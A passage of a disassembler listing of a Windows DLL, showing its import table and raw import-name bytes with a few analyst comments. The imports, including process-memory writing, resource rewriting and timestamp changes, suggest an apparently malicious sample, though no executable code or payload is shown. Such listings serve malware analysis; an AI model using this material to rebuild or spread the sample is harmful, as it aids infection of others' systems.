RegCreateKeyExA:dword ; DATA XREF: sub_3617164B+3Cr 36178014 ; sub_36174F1E+125r ... 36178018 extrn RegEnumKeyExA:dword ; DATA XREF: sub_3617164B+51r 36178018 ; sub_3617164B+6Er ... 3617801C extrn RegOpenKeyExA:dword ; DATA XREF: sub_3617164B+B5r 3617801C ; sub_3617164B+184r ... 36178020 extrn RegQueryValueExA:dword ; DATA XREF: sub_3617164B+E1r 36178020 ; sub_3617164B+1B0r ... 36178024 36178028 ; 36178028 ; Imports from KERNEL32.dll 36178028 ; 36178028 extrn LocalAlloc:dword ; DATA XREF: sub_36172AE2+E0r 36178028 ; sub_36172AE2+E7r ... 3617802C extrn GetFileSize:dword ; DATA XREF: sub_36173618+E1r 3617802C ; sub_36173878+7Er ... 36178030 extrn CreateThread:dword ; DATA XREF: sub_36172D72+1Er 36178030 ; sub_36176F10+11r ... 36178034 extrn ReleaseMutex:dword ; DATA XREF: sub_36172DAE+D9r 36178034 ; sub_36176F2C+1D9r ... 36178038 extrn HeapCreate:dword ; DATA XREF: _DllMain@12+14r 3617803C extrn GetLastError:dword ; DATA XREF: _DllMain@12+4Ar 3617803C ; _DllMain@12+72r ... 36178040 extrn WritePrivateProfileStringA:dword 36178040 ; DATA XREF: sub_36176C52+98r 36178044 extrn ExitProcess:dword ; DATA XREF: _DllMain@12+1B2r 36178048 extrn GetSystemTime:dword ; DATA XREF: sub_3617548D+11r 3617804C extrn HeapDestroy:dword ; DATA XREF: _DllMain@12+8Fr 3617804C ; _DllMain@12+B4r ... 36178050 extrn GetProcAddress:dword ; DATA XREF: K32_imports+1Cr 36178050 ; K32_imports+28r ... 36178054 extrn GetVersionExA:dword ; DATA XREF: sub_36174A06+1Ar 36178054 ; Get extended information about the 36178054 ; version of the operating system 36178058 extrn LoadLibraryA:dword ; DATA XREF: K32_imports+2r 36178058 ; K32_imports+Dr ... 3617805C extrn GetCurrentThreadId:dword ; DATA XREF: sub_36171000+23r 36178060 extrn CloseHandle:dword ; DATA XREF: sub_36171899+F8r 36178060 ; sub_361719A3+BFr ... 36178064 extrn WriteFile:dword ; DATA XREF: sub_36171899+A5r 36178064 ; sub_36171899+B5r ... 36178068 extrn SetFilePointer:dword ; DATA XREF: sub_36171899+7Br 36178068 ; sub_361719A3+5Cr ... 3617806C extrn CreateFileA:dword ; DATA XREF: sub_36171899+64r 3617806C ; sub_361719A3+29r ... 36178070 extrn MoveFileExA:dword ; DATA XREF: sub_36171899+1Br 36178074 extrn ReadFile:dword ; DATA XREF: sub_361719A3+50r 36178074 ; sub_361719A3+7Cr ... 36178078 extrn SetFileAttributesA:dword ; DATA XREF: sub_361719A3+13r 36178078 ; sub_361719A3+CAr ... 3617807C extrn FindClose:dword ; DATA XREF: sub_36171B36+1EEr 3617807C ; sub_3617339F+235r ... 36178080 extrn FindNextFileA:dword ; DATA XREF: sub_36171B36+149r 36178080 ; sub_3617339F+202r ... 36178084 extrn FindFirstFileA:dword ; DATA XREF: sub_36171B36+65r 36178084 ; sub_3617339F+6Er ... 36178088 extrn WriteProcessMemory:dword ; DATA XREF: sub_36171D7C+11Fr 3617808C extrn OpenProcess:dword ; DATA XREF: sub_36171D7C+8Er 36178090 extrn GetCurrentProcessId:dword ; DATA XREF: sub_36171D7C+79r 36178090 ; sub_36171D7C+175r 36178094 extrn lstrcmpiA:dword ; DATA XREF: sub_36171D7C+54r 36178094 ; sub_36172C91+13r 36178098 extrn HeapCompact:dword ; DATA XREF: sub_36171F05+C6r 36178098 ; sub_36171F05+ECr ... 3617809C extrn Sleep:dword ; DATA XREF: sub_36171F05+8Er 3617809C ; sub_36171F05+9Ar ... 361780A0 extrn GetTickCount:dword ; DATA XREF: sub_36171F05+7Br 361780A0 ; sub_36172DAE+2Cr ... 361780A4 extrn SetThreadPriority:dword ; DATA XREF: sub_36171F05+29r 361780A4 ; sub_36176F2C+14r ... 361780A8 extrn GetCurrentThread:dword ; DATA XREF: sub_36171F05+22r 361780A8 ; sub_36176F2C+Dr ... 361780AC extrn CreateMutexA:dword ; DATA XREF: sub_36171F05+18r 361780AC ; sub_361737C9+62r ... 361780B0 extrn lstrcpyA:dword ; DATA XREF: sub_361723F1+5Er 361780B0 ; sub_361723F1+6Er ... 361780B4 extrn GetComputerNameA:dword ; DATA XREF: sub_361723F1+4Cr 361780B4 ; sub_36175AA9+142r ... 361780B8 extrn LocalFree:dword ; DATA XREF: sub_36172494+560r 361780B8 ; sub_36172494+566r ... 361780BC extrn lstrlenA:dword ; DATA XREF: sub_36172AE2+170r 361780BC ; sub_36172AE2+177r ... 361780C0 extrn LoadResource:dword ; DATA XREF: sub_36173878+194r 361780C0 ; sub_36174125+48r 361780C4 extrn LockResource:dword ; DATA XREF: sub_36173878+1A3r 361780C4 ; sub_36174125+4Fr 361780C8 extrn GetModuleHandleA:dword ; DATA XREF: sub_361748F9+2Dr 361780CC extrn WaitForSingleObject:dword ; DATA XREF: sub_36172DAE+9r 361780CC ; sub_36176F2C+16Fr ... 361780D0 extrn GetDriveTypeA:dword ; DATA XREF: sub_36173325+57r 361780D0 ; sub_36174125+8Dr 361780D4 extrn GetLogicalDrives:dword ; DATA XREF: sub_36173325+9r 361780D4 ; Get bitmask representing 361780D4 ; the currently available disk drives 361780D8 extrn FreeLibrary:dword ; DATA XREF: sub_36173878+164r 361780D8 ; sub_36173878+2AAr ... 361780DC extrn CopyFileA:dword ; DATA XREF: sub_36173618+69r 361780DC ; sub_36173878+115r ... 361780E0 extrn GetFileAttributesA:dword ; DATA XREF: sub_36173878+515r 361780E4 extrn SetFileTime:dword ; DATA XREF: sub_36173878+50Br 361780E8 extrn GetFileTime:dword ; DATA XREF: sub_36173878+4D5r 361780EC extrn EndUpdateResourceA:dword ; DATA XREF: sub_36173878+46Cr 361780EC ; sub_361766AC+87r ... 361780F0 extrn UpdateResourceA:dword ; DATA XREF: sub_36173878+31Fr 361780F0 ; sub_36173878+330r ... 361780F4 extrn SizeofResource:dword ; DATA XREF: sub_36173878+1B8r 361780F4 ; sub_36174125+58r ... 361780F8 extrn GetWindowsDirectoryA:dword ; DATA XREF: sub_361748F9+49r 361780F8 ; sub_36176511+33r ... 361780FC extrn GetTempFileNameA:dword ; DATA XREF: sub_36173878+E0r 361780FC ; sub_36174125+10Fr ... 36178100 extrn FindResourceA:dword ; DATA XREF: sub_36173878+17Fr 36178100 ; sub_36174125+3Dr 36178104 extrn CreateProcessA:dword ; DATA XREF: sub_36174125+1CFr 36178104 ; sub_36176511+180r ... 36178108 extrn BeginUpdateResourceA:dword ; DATA XREF: sub_36173878+151r 36178108 ; sub_361766AC+56r ... 3617810C extrn LoadLibraryExA:dword ; DATA XREF: sub_36173878+137r 3617810C ; sub_36174125+30r 36178110 extrn DeleteFileA:dword ; DATA XREF: sub_36173878+F3r 36178110 ; sub_36173878+2A0r ... 36178114 extrn GetTempPathA:dword ; DATA XREF: sub_361748F9+71r 36178114 ; sub_36176511+56r 36178118 extrn GetModuleFileNameA:dword ; DATA XREF: sub_361748F9+AFr 36178118 ; sub_36176511+ACr ... 3617811C extrn GetCurrentDirectoryA:dword ; DATA XREF: sub_361748F9+98r 3617811C ; sub_36176511+7Dr 36178120 extrn GetCommandLineA:dword ; DATA XREF: sub_361748F9+7Er 36178120 ; sub_36176511+63r ... 36178124 extrn GetSystemDirectoryA:dword ; DATA XREF: sub_361748F9+5Dr 36178124 ; sub_36176511+47r 36178128 3617812C ; 3617812C ; Imports from MSVCRT.dll 3617812C ; 3617812C extrn srand:dword ; DATA XREF: sub_36171F05+82r 3617812C ; sub_36172DAE+39r ... 36178130 extrn strncpy:dword ; DATA XREF: sub_36171000+124r 36178130 ; sub_36171000+267r ... 36178134 extrn _initterm:dword ; DATA XREF: __inittermr 36178138 extrn _adjust_fdiv:dword ; DATA XREF: __CRT_INIT@12+16r 3617813C extrn atoi:dword ; DATA XREF: sub_36172AE2+180r 36178140 extrn strrchr:dword ; DATA XREF: sub_361748F9+CFr 36178144 extrn strstr:dword ; DATA XREF: sub_3617339F+A1r 36178144 ; sub_3617339F+192r ... 36178148 extrn free:dword ; DATA XREF: sub_3617223F+Ar 36178148 ; sub_3617223F+1Cr ... 3617814C extrn malloc:dword ; DATA XREF: .text:361722FEr 3617814C ; .text:361723B2r ... 36178150 extrn sprintf:dword ; DATA XREF: .text:36172332r 36178150 ; sub_361723F1+89r ... 36178154 extrn strncat:dword ; DATA XREF: sub_36171B36+47r 36178154 ; sub_36171B36+58r ... 36178158 extrn _strlwr:dword ; DATA XREF: sub_36171B36+81r 36178158 ; sub_36171B36+15Er ... 3617815C extrn strcmp:dword ; DATA XREF: _strcmpr 36178160 extrn rand:dword ; DATA XREF: random_numgenr 36178160 ; sub_36172DAE+3Fr ... 36178164 extrn strcat:dword ; DATA XREF: _strcatr 36178168 extrn strchr:dword ; DATA XREF: sub_3617164B+12Er 36178168 ; sub_3617164B+1D0r ... 3617816C extrn memcpy:dword ; DATA XREF: _memcpyr 36178170 extrn strtok:dword ; DATA XREF: sub_36171289+37r 36178170 ; sub_36171289+71r 36178174 extrn strlen:dword ; DATA XREF: _strlenr 36178178 extrn strcpy:dword ; DATA XREF: _strcpyr 3617817C extrn memset:dword ; DATA XREF: _memsetr 36178180 36178180 36178184 ; ═══════════════════════════════════════════════════════════════════════════ 36178184 36178184 ; Segment type: Pure data 36178184 _rdata segment para public 'DATA' use32 36178184 assume cs:_rdata 36178184 ;org 36178184h 36178184 db 0 ; ; the asciiz strings below are simply the imports from KERNEL32.DLL.. 36178184 ; 36178185 db 83h ; â 36178186 db 0 ; 36178187 db 0 ; 36178188 db 0 ; 36178189 db 0 ; 3617818A db 0 ; 3617818B db 0 ; 3617818C db 0 ; 3617818D db 0 ; 3617818E db 0 ; 3617818F db 0 ; 36178190 db 0Eh ; 36178191 db 84h ; ä 36178192 db 0 ; 36178193 db 0 ; 36178194 db 2Ch ; , 36178195 db 81h ; ü 36178196 db 0 ; 36178197 db 0 ; 36178198 db 0FCh ; ⁿ 36178199 db 81h ; ü 3617819A db 0 ; 3617819B db 0 ; 3617819C db 0 ; 3617819D db 0 ; 3617819E db 0 ; 3617819F db 0 ; 361781A0 db 0 ; 361781A1 db 0 ; 361781A2 db 0 ; 361781A3 db 0 ; 361781A4 db 76h ; v 361781A5 db 88h ; ê 361781A6 db 0 ; 361781A7 db 0 ; 361781A8 db 28h ; ( 361781A9 db 80h ; Ç 361781AA db 0 ; 361781AB db 0 ; 361781AC db 0D4h ; ╘ 361781AD db 81h ; ü 361781AE db 0 ; 361781AF db 0 ; 361781B0 db 0 ; 361781B1 db 0 ; 361781B2 db 0 ; 361781B3 db 0 ; 361781B4 db 0 ; 361781B5 db 0 ; 361781B6 db 0 ; 361781B7 db 0 ; 361781B8 db 1Ch ; 361781B9 db 89h ; ë 361781BA db 0 ; 361781BB db 0 ; 361781BC db 0 ; 361781BD db 80h ; Ç 361781BE db 0 ; 361781BF db 0 ; 361781C0 db 0 ; 361781C1 db 0 ; 361781C2 db 0 ; 361781C3 db 0 ; 361781C4 db 0 ; 361781C5 db 0 ; 361781C6 db 0 ; 361781C7 db 0 ; 361781C8 db 0 ; 361781C9 db 0 ; 361781CA db 0 ; 361781CB db 0 ; 361781CC db 0 ; 361781CD db 0 ; 361781CE db 0 ; 361781CF db 0 ; 361781D0 db 0 ; 361781D1 db 0 ; 361781D2 db 0 ; 361781D3 db 0 ; 361781D4 db 0D8h ; ╪ 361781D5 db 88h ; ê 361781D6 db 0 ; 361781D7 db 0 ; 361781D8 db 0Ah ; 361781D9 db 89h ; ë 361781DA db 0 ; 361781DB db 0 ; 361781DC db 0F8h ; ° 361781DD db 88h ; ê 361781DE db 0 ; 361781DF db 0 ; 361781E0 db 0E8h ; Φ 361781E1 db 88h ; ê 361781E2 db 0 ; 361781E3 db 0 ; 361781E4 db 84h ; ä 361781E5 db 88h ; ê 361781E6 db 0 ; 361781E7 db 0 ; 361781E8 db 0C6h ; ╞ 361781E9 db 88h ; ê 361781EA db 0 ; 361781EB db 0 ; 361781EC db 0B6h ; ╢ 361781ED db 88h ; ê 361781EE db 0 ; 361781EF db 0 ; 361781F0 db 0A6h ; ª 361781F1 db 88h ; ê 361781F2 db 0 ; 361781F3 db 0 ; 361781F4 db 92h ; Æ 361781F5 db 88h ; ê 361781F6 db 0 ; 361781F7 db 0 ; 361781F8 db 0 ; 361781F9 db 0 ; 361781FA db 0 ; 361781FB db 0 ; 361781FC db 0C0h ; └ 361781FD db 85h ; à 361781FE db 0 ; 361781FF db 0 ; 36178200 db 28h ; ( 36178201 db 86h ; å 36178202 db 0 ; 36178203 db 0 ; 36178204 db 0CEh ; ╬ 36178205 db 85h ; à 36178206 db 0 ; 36178207 db 0 ; 36178208 db 0DEh ; ▐ 36178209 db 85h ; à 3617820A db 0 ; 3617820B db 0 ; 3617820C db 4Ah ; J 3617820D db 88h ; ê 3617820E db 0 ; 3617820F db 0 ; 36178210 db 3Ah ; : 36178211 db 88h ; ê 36178212 db 0 ; 36178213 db 0 ; 36178214 db 58h ; X 36178215 db 88h ; ê 36178216 db 0 ; 36178217 db 0 ; 36178218 db 1Eh ; 36178219 db 88h ; ê 3617821A db 0 ; 3617821B db 0 ; 3617821C db 0Eh ; 3617821D db 88h ; ê 3617821E db 0 ; 3617821F db 0 ; 36178220 db 2Ch ; , 36178221 db 88h ; ê 36178222 db 0 ; 36178223 db 0 ; 36178224 db 0ECh ; ∞ 36178225 db 87h ; ç 36178226 db 0 ; 36178227 db 0 ; 36178228 db 0DCh ; ▄ 36178229 db 87h ; ç 3617822A db 0 ; 3617822B db 0 ; 3617822C db 0FEh ; ■ 3617822D db 87h ; ç 3617822E db 0 ; 3617822F db 0 ; 36178230 db 36h ; 6 36178231 db 84h ; ä 36178232 db 0 ; 36178233 db 0 ; 36178234 db 4Ch ; L 36178235 db 84h ; ä 36178236 db 0 ; 36178237 db 0 ; 36178238 db 5Ah ; Z 36178239 db 84h ; ä 3617823A db 0 ; 3617823B db 0 ; 3617823C db 66h ; f 3617823D db 84h ; ä 3617823E db 0 ; 3617823F db 0 ; 36178240 db 78h ; x 36178241 db 84h ; ä 36178242 db 0 ; 36178243 db 0 ; 36178244 db 86h ; å 36178245 db 84h ; ä 36178246 db 0 ; 36178247 db 0 ; 36178248 db 94h ; ö 36178249 db 84h ; ä 3617824A db 0 ; 3617824B db 0 ; 3617824C db 0A0h ; á 3617824D db 84h ; ä 3617824E db 0 ; 3617824F db 0 ; 36178250 db 0B6h ; ╢ 36178251 db 84h ; ä 36178252 db 0 ; 36178253 db 0 ; 36178254 db 0C2h ; ┬ 36178255 db 84h ; ä 36178256 db 0 ; 36178257 db 0 ; 36178258 db 0D2h ; ╥ 36178259 db 84h ; ä 3617825A db 0 ; 3617825B db 0 ; 3617825C db 0E4h ; Σ 3617825D db 84h ; ä 3617825E db 0 ; 3617825F db 0 ; 36178260 db 0FAh ; · 36178261 db 84h ; ä 36178262 db 0 ; 36178263 db 0 ; 36178264 db 8 ; 36178265 db 85h ; à 36178266 db 0 ; 36178267 db 0 ; 36178268 db 1Eh ; 36178269 db 85h ; à 3617826A db 0 ; 3617826B db 0 ; 3617826C db 2Ah ; * 3617826D db 85h ; à 3617826E db 0 ; 3617826F db 0 ; 36178270 db 38h ; 8 36178271 db 85h ; à 36178272 db 0 ; 36178273 db 0 ; 36178274 db 40h ; @ 36178275 db 85h ; à 36178276 db 0 ; 36178277 db 0 ; 36178278 db 50h ; P 36178279 db 85h ; à 3617827A db 0 ; 3617827B db 0 ; 3617827C db 64h ; d 3617827D db 85h ; à 3617827E db 0 ; 3617827F db 0 ; 36178280 db 78h ; x 36178281 db 85h ; à 36178282 db 0 ; 36178283 db 0 ; 36178284 db 88h ; ê 36178285 db 85h ; à 36178286 db 0 ; 36178287 db 0 ; 36178288 db 94h ; ö 36178289 db 85h ; à 3617828A db 0 ; 3617828B db 0 ; 3617828C db 0A8h ; ¿ 3617828D db 85h ; à 3617828E db 0 ; 3617828F db 0 ; 36178290 db 0B4h ; ┤ 36178291 db 85h ; à 36178292 db 0 ; 36178293 db 0 ; 36178294 db 0BEh ; ╛ 36178295 db 86h ; å 36178296 db 0 ; 36178297 db 0 ; 36178298 db 0AEh ; « 36178299 db 86h ; å 3617829A db 0 ; 3617829B db 0 ; 3617829C db 0C8h ; ╚ 3617829D db 87h ; ç 3617829E db 0 ; 3617829F db 0 ; 361782A0 db 0EEh ; ε 361782A1 db 85h ; à 361782A2 db 0 ; 361782A3 db 0 ; 361782A4 db 4 ; 361782A5 db 86h ; å 361782A6 db 0 ; 361782A7 db 0 ; 361782A8 db 14h ; 361782A9 db 86h ; å 361782AA db 0 ; 361782AB db 0 ; 361782AC db 0DEh ; ▐ 361782AD db 86h ; å 361782AE db 0 ; 361782AF db 0 ; 361782B0 db 36h ; 6 361782B1 db 86h ; å 361782B2 db 0 ; 361782B3 db 0 ; 361782B4 db 42h ; B 361782B5 db 86h ; å 361782B6 db 0 ; 361782B7 db 0 ; 361782B8 db 58h ; X 361782B9 db 86h ; å 361782BA db 0 ; 361782BB db 0 ; 361782BC db 66h ; f 361782BD db 86h ; å 361782BE db 0 ; 361782BF db 0 ; 361782C0 db 74h ; t 361782C1 db 86h ; å 361782C2 db 0 ; 361782C3 db 0 ; 361782C4 db 8Ah ; è 361782C5 db 86h ; å 361782C6 db 0 ; 361782C7 db 0 ; 361782C8 db 9Ch ; £ 361782C9 db 86h ; å 361782CA db 0 ; 361782CB db 0 ; 361782CC db 0B0h ; ░ 361782CD db 87h ; ç 361782CE db 0 ; 361782CF db 0 ; 361782D0 db 24h ; $ 361782D1 db 87h ; ç 361782D2 db 0 ; 361782D3 db 0 ; 361782D4 db 0CEh ; ╬ 361782D5 db 86h ; å 361782D6 db 0 ; 361782D7 db 0 ; 361782D8 db 38h ; 8 361782D9 db 87h ; ç 361782DA db 0 ; 361782DB db 0 ; 361782DC db 0ECh ; ∞ 361782DD db 86h ; å 361782DE db 0 ; 361782DF db 0 ; 361782E0 db 4 ; 361782E1 db 87h ; ç 361782E2 db 0 ; 361782E3 db 0 ; 361782E4 db 16h ; 361782E5 db 87h ; ç 361782E6 db 0 ; 361782E7 db 0 ; 361782E8 db 8Ah ; è 361782E9 db 87h ; ç 361782EA db 0 ; 361782EB db 0 ; 361782EC db 4Ah ; J 361782ED db 87h ; ç 361782EE db 0 ; 361782EF db 0 ; 361782F0 db 60h ; ` 361782F1 db 87h ; ç 361782F2 db 0 ; 361782F3 db 0 ; 361782F4 db 78h ; x 361782F5 db 87h ; ç 361782F6 db 0 ; 361782F7 db 0 ; 361782F8 db 9Ah ; Ü 361782F9 db 87h ; ç 361782FA db 0 ; 361782FB db 0 ; 361782FC db 0 ; 361782FD db 0 ; 361782FE db 0 ; 361782FF db 0 ; 36178300 db 0CEh ; ╬ 36178301 db 83h ; â 36178302 db 0 ; 36178303 db 0 ; 36178304 db 58h ; X 36178305 db 83h ; â 36178306 db 0 ; 36178307 db 0 ; 36178308 db 1Ah ; 36178309 db 84h ; ä 3617830A db 0 ; 3617830B db 0 ; 3617830C db 26h ; & 3617830D db 84h ; ä 3617830E db 0 ; 3617830F db 0 ; 36178310 db 0F2h ; ≥ 36178311 db 83h ; â 36178312 db 0 ; 36178313 db 0 ; 36178314 db 4 ; 36178315 db 84h ; ä 36178316 db 0 ; 36178317 db 0 ; 36178318 db 0FAh ; · 36178319 db 83h ; â 3617831A db 0 ; 3617831B db 0 ; 3617831C db 0D6h ; ╓ 3617831D db 83h ; â 3617831E db 0 ; 3617831F db 0 ; 36178320 db 0E8h ; Φ 36178321 db 83h ; â 36178322 db 0 ; 36178323 db 0 ; 36178324 db 0DEh ; ▐ 36178325 db 83h ; â 36178326 db 0 ; 36178327 db 0 ; 36178328 db 0C4h ; ─ 36178329 db 83h ; â 3617832A db 0 ; 3617832B db 0 ; 3617832C db 0BAh ; ║ 3617832D db 83h ; â 3617832E db 0 ; 3617832F db 0 ; 36178330 db 0B0h ; ░ 36178331 db 83h ; â 36178332 db 0 ; 36178333 db 0 ; 36178334 db 0A8h ; ¿ 36178335 db 83h ; â 36178336 db 0 ; 36178337 db 0 ; 36178338 db 9Eh ; ₧ 36178339 db 83h ; â 3617833A db 0 ; 3617833B db 0 ; 3617833C db 94h ; ö 3617833D db 83h ; â 3617833E db 0 ; 3617833F db 0 ; 36178340 db 8Ah ; è 36178341 db 83h ; â 36178342 db 0 ; 36178343 db 0 ; 36178344 db 80h ; Ç 36178345 db 83h ; â 36178346 db 0 ; 36178347 db 0 ; 36178348 db 76h ; v 36178349 db 83h ; â 3617834A db 0 ; 3617834B db 0 ; 3617834C db 6Ch ; l 3617834D db 83h ; â 3617834E db 0 ; 3617834F db 0 ; 36178350 db 62h ; b 36178351 db 83h ; â 36178352 db 0 ; 36178353 db 0 ; 36178354 db 0 ; 36178355 db 0 ; 36178356 db 0 ; 36178357 db 0 ; 36178358 db 0C1h ; ┴ 36178359 db 2 ; 3617835A aStrncpy db 'strncpy',0 36178362 db 99h ; Ö 36178363 db 2 ; 36178364 aMemset db 'memset',0 3617836B db 0 ; 3617836C db 0BAh ; ║ 3617836D db 2 ; 3617836E aStrcpy db 'strcpy',0 36178375 db 0 ; 36178376 db 0BEh ; ╛ 36178377 db 2 ; 36178378 aStrlen db 'strlen',0 3617837F db 0 ; 36178380 db 0C7h ; ╟ 36178381 db 2 ; 36178382 aStrtok db 'strtok',0 36178389 db 0 ; 3617838A db 97h ; ù 3617838B db 2 ; 3617838C aMemcpy db 'memcpy',0 36178393 db 0 ; 36178394 db 0B7h ; ╖ 36178395 db 2 ; 36178396 aStrchr db 'strchr',0 3617839D db 0 ; 3617839E db 0B6h ; ╢ 3617839F db 2 ; 361783A0 aStrcat db 'strcat',0 361783A7 db 0 ; 361783A8 db 0A6h ; ª 361783A9 db 2 ; 361783AA aRand db 'rand',0 361783AF db 0 ; 361783B0 db 0B8h ; ╕ 361783B1 db 2 ; 361783B2 aStrcmp db 'strcmp',0 361783B9 db 0 ; 361783BA db 0C3h ; ├ 361783BB db 1 ; 361783BC a_strlwr db '_strlwr',0 361783C4 db 0BFh ; ┐ 361783C5 db 2 ; 361783C6 aStrncat db 'strncat',0 361783CE db 0B4h ; ┤ 361783CF db 2 ; 361783D0 aSrand db 'srand',0 361783D6 db 5Eh ; ^ 361783D7 db 2 ; 361783D8 aFree db 'free',0 361783DD db 0 ; 361783DE db 0B2h ; ▓ 361783DF db 2 ; 361783E0 aSprintf db 'sprintf',0 361783E8 db 91h ; æ 361783E9 db 2 ; 361783EA aMalloc db 'malloc',0 361783F1 db 0 ; 361783F2 db 3Dh ; = 361783F3 db 2 ; 361783F4 aAtoi db 'atoi',0 361783F9 db 0 ; 361783FA db 0C5h ; ┼ 361783FB db 2 ; 361783FC aStrstr db 'strstr',0 36178403 db 0 ; 36178404 db 0C3h ; ├ 36178405 db 2 ; 36178406 aStrrchr db 'strrchr',0 3617840E aMsvcrt_dll db 'MSVCRT.dll',0 36178419 db 0 ; 3617841A db 0Fh ; 3617841B db 1 ; 3617841C a_initterm db '_initterm',0 36178426 db 9Dh ; ¥ 36178427 db 0 ; 36178428 a_adjust_fdiv db '_adjust_fdiv',0 36178435 db 0 ; 36178436 db 0FAh ; · 36178437 db 0 ; 36178438 aGetcurrentthre db 'GetCurrentThreadId',0 3617844B db 0 ; 3617844C db 1Bh ; 3617844D db 0 ; 3617844E aClosehandle db 'CloseHandle',0 3617845A db 0DFh ; ▀ 3617845B db 2 ; 3617845C aWritefile db 'WriteFile',0 36178466 db 6Ah ; j 36178467 db 2 ; 36178468 aSetfilepointer db 'SetFilePointer',0 36178477 db 0 ; 36178478 db 34h ; 4 36178479 db 0 ; 3617847A aCreatefilea db 'CreateFileA',0 36178486 db 0DEh ; ▐ 36178487 db 1 ; 36178488 aMovefileexa db 'MoveFileExA',0 36178494 db 18h ; 36178495 db 2 ; 36178496 aReadfile db 'ReadFile',0 3617849F db 0 ; 361784A0 db 68h ; h 361784A1 db 2 ; 361784A2 aSetfileattribu db 'SetFileAttributesA',0 361784B5 db 0 ; 361784B6 db 90h ; É 361784B7 db 0 ; 361784B8 aFindclose db 'FindClose',0 361784C2 db 9Dh ; ¥ 361784C3 db 0 ; 361784C4 aFindnextfilea db 'FindNextFileA',0 361784D2 db 94h ; ö 361784D3 db 0 ; 361784D4 aFindfirstfilea db 'FindFirstFileA',0 361784E3 db 0 ; 361784E4 db 0E9h ; Θ 361784E5 db 2 ; 361784E6 aWriteprocessme db 'WriteProcessMemory',0 361784F9 db 0 ; 361784FA db 0EFh ; ∩ 361784FB db 1 ; 361784FC aOpenprocess db 'OpenProcess',0 36178508 db 0F8h ; ° 36178509 db 0 ; 3617850A aGetcurrentproc db 'GetCurrentProcessId',0 3617851E db 0FFh ; 3617851F db 2 ; 36178520 aLstrcmpia db 'lstrcmpiA',0 3617852A db 9Ah ; Ü 3617852B db 1 ; 3617852C aHeapcompact_0 db 'HeapCompact',0 36178538 db 96h ; û 36178539 db 2 ; 3617853A aSleep db 'Sleep',0 36178540 db 6Dh ; m 36178541 db 1 ; 36178542 aGettickcount db 'GetTickCount',0 3617854F db 0 ; 36178550 db 87h ; ç 36178551 db 2 ; 36178552 aSetthreadprior db 'SetThreadPriority',0 36178564 db 0F9h ; ∙ 36178565 db 0 ; 36178566 aGetcurrentth_0 db 'GetCurrentThread',0 36178577 db 0 ; 36178578 db 3Fh ; ? 36178579 db 0 ; 3617857A aCreatemutexa db 'CreateMutexA',0 36178587 db 0 ; 36178588 db 2 ; 36178589 db 3 ; 3617858A aLstrcpya db 'lstrcpyA',0 36178593 db 0 ; 36178594 db 0CEh ; ╬ 36178595 db 0 ; 36178596 aGetcomputernam db 'GetComputerNameA',0 361785A7 db 0 ; 361785A8 db 0CCh ; ╠ 361785A9 db 1 ; 361785AA aLocalfree db 'LocalFree',0 361785B4 db 8 ; 361785B5 db 3 ; 361785B6 aLstrlena db 'lstrlenA',0 361785BF db 0 ; 361785C0 db 0C8h ; ╚ 361785C1 db 1 ; 361785C2 aLocalalloc db 'LocalAlloc',0 361785CD db 0 ; 361785CE db 4Ah ; J 361785CF db 0 ; 361785D0 aCreatethread db 'CreateThread',0 361785DD db 0 ; 361785DE db 25h ; % 361785DF db 2 ; 361785E0 aReleasemutex db 'ReleaseMutex',0 361785ED db 0 ; 361785EE db 0CEh ; ╬ 361785EF db 2 ; 361785F0 aWaitforsingleo db 'WaitForSingleObject',0 36178604 db 4 ; 36178605 db 1 ; 36178606 aGetdrivetypea db 'GetDriveTypeA',0 36178614 db 20h ; 36178615 db 1 ; 36178616 aGetlogicaldriv db 'GetLogicalDrives',0 36178627 db 0 ; 36178628 db 12h ; 36178629 db 1 ; 3617862A aGetfilesize db 'GetFileSize',0 36178636 db 28h ; ( 36178637 db 0 ; 36178638 aCopyfilea db 'CopyFileA',0 36178642 db 0Dh ; 36178643 db 1 ; 36178644 aGetfileattribu db 'GetFileAttributesA',0 36178657 db 0 ; 36178658 db 6Ch ; l 36178659 db 2 ; 3617865A aSetfiletime db 'SetFileTime',0 36178666 db 14h ; 36178667 db 1 ; 36178668 aGetfiletime db 'GetFileTime',0 36178674 db 64h ; d 36178675 db 0 ; 36178676 aEndupdateresou db 'EndUpdateResourceA',0 36178689 db 0 ; 3617868A db 0B4h ; ┤ 3617868B db 2 ; 3617868C aUpdateresource db 'UpdateResourceA',0 3617869C db 95h ; ò 3617869D db 2 ; 3617869E aSizeofresource db 'SizeofResource',0 361786AD db 0 ; 361786AE db 0D5h ; ╒ 361786AF db 1 ; 361786B0 aLockresource db 'LockResource',0 361786BD db 0 ; 361786BE db 0C7h ; ╟ 361786BF db 1 ; 361786C0 aLoadresource db 'LoadResource',0 361786CD db 0 ; 361786CE db 0A3h ; ú 361786CF db 0 ; 361786D0 aFindresourcea db 'FindResourceA',0 361786DE db 0B4h ; ┤ 361786DF db 0 ; 361786E0 aFreelibrary db 'FreeLibrary',0 361786EC db 0Ch ; 361786ED db 0 ; 361786EE aBeginupdateres db 'BeginUpdateResourceA',0 36178703 db 0 ; 36178704 db 0C3h ; ├ 36178705 db 1 ; 36178706 aLoadlibraryexa db 'LoadLibraryExA',0 36178715 db 0 ; 36178716 db 57h ; W 36178717 db 0 ; 36178718 aDeletefilea db 'DeleteFileA',0 36178724 db 63h ; c 36178725 db 1 ; 36178726 aGettempfilenam db 'GetTempFileNameA',0 36178737 db 0 ; 36178738 db 44h ; D 36178739 db 0 ; 3617873A aCreateprocessa db 'CreateProcessA',0 36178749 db 0 ; 3617874A db 24h ; $ 3617874B db 1 ; 3617874C aGetmodulefilen db 'GetModuleFileNameA',0 3617875F db 0 ; 36178760 db 0F5h ; ⌡ 36178761 db 0 ; 36178762 aGetcurrentdire db 'GetCurrentDirectoryA',0 36178777 db 0 ; 36178778 db 0CAh ; ╩ 36178779 db 0 ; 3617877A aGetcommandline db 'GetCommandLineA',0 3617878A db 65h ; e 3617878B db 1 ; 3617878C aGettemppatha db 'GetTempPathA',0 36178799 db 0 ; 3617879A db 59h ; Y 3617879B db 1 ; 3617879C aGetsystemdirec db 'GetSystemDirectoryA',0 361787B0 db 7Dh ; } 361787B1 db 1 ; 361787B2 aGetwindowsdire db 'GetWindowsDirectoryA',0 361787C7 db 0 ; 361787C8 db 26h ; & 361787C9 db 1 ; 361787CA aGetmodulehandl db 'GetModuleHandleA',0 361787DB db 0 ; 361787DC db 75h ; u 361787DD db 1 ; 361787DE aGetversionexa db 'GetVersionExA',0 361787EC db 3Eh ; > 361787ED db 1 ; 361787EE aGetprocaddress db 'GetProcAddress',0 361787FD db 0 ; 361787FE db 0C2h ; ┬ 361787FF db 1 ; 36178800 